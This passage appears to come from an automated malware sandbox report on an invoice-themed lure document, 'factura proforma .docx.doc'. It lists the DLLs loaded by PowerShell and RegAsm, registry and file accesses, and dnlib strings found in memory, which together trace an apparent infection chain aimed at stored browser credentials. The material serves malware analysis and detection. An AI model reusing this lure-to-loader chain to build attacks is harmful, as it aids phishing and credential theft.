                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: factura proforma .docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\factura proforma .docx.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: factura proforma .docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: factura proforma .docx.docInitial sample: OLE zip file path = word/media/image4.emf
                  Source: factura proforma .docx.docInitial sample: OLE zip file path = word/media/image3.emf
                  Source: factura proforma .docx.docInitial sample: OLE zip file path = word/media/image2.emf
                  Source: factura proforma .docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.411668691.0000000000420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.411668691.0000000000420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
